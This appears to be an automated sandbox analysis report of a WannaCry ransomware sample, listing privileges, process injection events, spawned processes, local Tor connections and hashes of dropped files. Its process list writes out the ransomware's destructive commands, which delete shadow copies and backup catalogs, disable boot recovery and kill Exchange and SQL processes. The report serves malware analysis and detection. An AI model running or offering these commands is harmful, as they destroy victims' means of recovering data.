Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3256 wrote to memory of 1168 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 3256 wrote to memory of 1168 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 3256 wrote to memory of 1168 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 1168 wrote to memory of 4692 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cscript.exe
PID 1168 wrote to memory of 4692 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cscript.exe
PID 1168 wrote to memory of 4692 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cscript.exe
PID 3256 wrote to memory of 888 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 888 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 888 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4252 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4252 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4252 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 1364 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 1364 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 1364 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4448 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4448 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4448 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 856 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 856 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 856 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 3092 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 3256 wrote to memory of 3092 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 3256 wrote to memory of 3092 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Windows\SysWOW64\cmd.exe
PID 3092 wrote to memory of 928 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3092 wrote to memory of 928 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3092 wrote to memory of 928 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 1168 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 1168 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 1168 | N/A | C:\Users\Admin\AppData\Local\Temp\WannaCry.exe | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 928 wrote to memory of 3724 | N/A | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | C:\Windows\SysWOW64\cmd.exe
PID 928 wrote to memory of 3724 | N/A | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | C:\Windows\SysWOW64\cmd.exe
PID 928 wrote to memory of 3724 | N/A | C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe | C:\Windows\SysWOW64\cmd.exe
PID 3724 wrote to memory of 452 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3724 wrote to memory of 452 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3724 wrote to memory of 452 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\Wbem\WMIC.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\WannaCry.exe

"C:\Users\Admin\AppData\Local\Temp\WannaCry.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 197341729450364.bat

C:\Windows\SysWOW64\cscript.exe

cscript //nologo c.vbs

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im MSExchange*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Microsoft.Exchange.*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sqlserver.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sqlwriter.exe

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe c

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b !WannaDecryptor!.exe v

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe v

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
N/A 127.0.0.1:9050 N/A tcp
N/A 127.0.0.1:9150 N/A tcp
N/A 127.0.0.1:9050 N/A tcp
N/A 127.0.0.1:9050 N/A tcp
N/A 127.0.0.1:9150 N/A tcp
N/A 127.0.0.1:9150 N/A tcp
N/A 127.0.0.1:9050 N/A tcp
N/A 127.0.0.1:9050 N/A tcp
N/A 127.0.0.1:9150 N/A tcp
N/A 127.0.0.1:9150 N/A tcp

Files

memory/3256-6-0x0000000010000000-0x0000000010012000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u.wry

MD5 cf1416074cd7791ab80a18f9e7e219d9
SHA1 276d2ec82c518d887a8a3608e51c56fa28716ded
SHA256 78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df
SHA512 0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

C:\Users\Admin\AppData\Local\Temp\197341729450364.bat

MD5 3540e056349c6972905dc9706cd49418
SHA1 492c20442d34d45a6d6790c720349b11ec591cde
SHA256 73872a89440a2cba9d22bf4961c3d499ea2c72979c30c455f942374292fedadc
SHA512 c949d147100aef59e382c03abf7b162ae62a4d43456eebd730fbedcf5f95f5e1a24f6e349690d52d75331878a6ee8f6b88a7162ee9cf2a49e142196b12d0133c

C:\Users\Admin\AppData\Local\Temp\c.vbs

MD5 5f6d40ca3c34b470113ed04d06a88ff4
SHA1 50629e7211ae43e32060686d6be17ebd492fd7aa
SHA256 0fb5039a2fe7e90cdf3f22140d7f2103f94689b15609efe0edcc8430dd772fc1
SHA512 4d4aa1abd2c9183202fd3f0a65b37f07ee0166ba6561f094c13c8ea59752c7bdd960e37c49583746d4464bc3b1dc0b63a1fe36a37ce7e5709cd76ed433befe35

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe.lnk

MD5 7fda7a2bc027ce376e360254a00d5c3a
SHA1 d898f092d58f6356f1149999466cf5d2ca0cb21a
SHA256 b2bf2d02cf04068ec1a5120ea5416e9e56db6800479c168b60af28e325141e57
SHA512 eebbf24920b5035005859152cfe831442df6134346ea61d6361b7b01860d913cb4688badd974698daa87c1820d96b6f5a568b98fcb55cf26b34104af9ed0e6aa

C:\Users\Admin\AppData\Local\Temp\c.wry

MD5 d5826e36a887bf8a4905d3a7df12f8e6
SHA1 b208d89da4bcc9ba38db50f90513e5cff818f1de
SHA256 9e436a4f8eae5ed4836d9883c572612ae11d15761a430d0eae314d96a43ea081
SHA512 b2fb4e33571cbc1b424e9c2b36fbc1c7f8564b00a92df6fb335f8252fdcf5a05dc690de86d762f6e075cf735770d7935f8e3404c2ccb2dda5daef49e1432bdb1

C:\Users\Admin\AppData\Local\Temp\00000000.res

MD5 bb16e480d877f6447196eaf7f68c9298
SHA1 d13b8685f99b10cf155e2a8acea0bf1eed132e32
SHA256 f1ef9df2d92dc46d3565d0932e74f6da8346439f5b7abad048a37290d3e55257
SHA512 55533d647eb943f256bf365a4c9f7274fedc8c01e6bca703a3b10a9da0ca5f84f999d5cdee76f67cf6b9fef6111b9364c63e23abfa6c965228938061ad95ad14

C:\Users\Admin\AppData\Local\Temp\!Please Read Me!.txt

MD5 afa18cf4aa2660392111763fb93a8c3d
SHA1 c219a3654a5f41ce535a09f2a188a464c3f5baf5
SHA256 227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0
SHA512 4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

C:\Users\Admin\AppData\Local\Temp\00000000.res

MD5 8b02d1311ffcf6007f9d5ee7395d42af
SHA1 e1fb58234a39807e6c67bc343c4f25d8650578fe
SHA256 7360d481a480e53640b5af93237ceea5a2c9540083b4c2687a565cca88e57e60
SHA512 22d4229995dd88f199b261d12d9f2d69c3fb533da99ce532baa3e4a8027a9404cfc83a99ac133e8b9e66f1facb03e1d618003ac2438af3b29476fed431f689dc

C:\Users\Admin\AppData\Local\Temp\m.wry

MD5 980b08bac152aff3f9b0136b616affa5
SHA1 2a9c9601ea038f790cc29379c79407356a3d25a3
SHA256 402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9
SHA512 100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496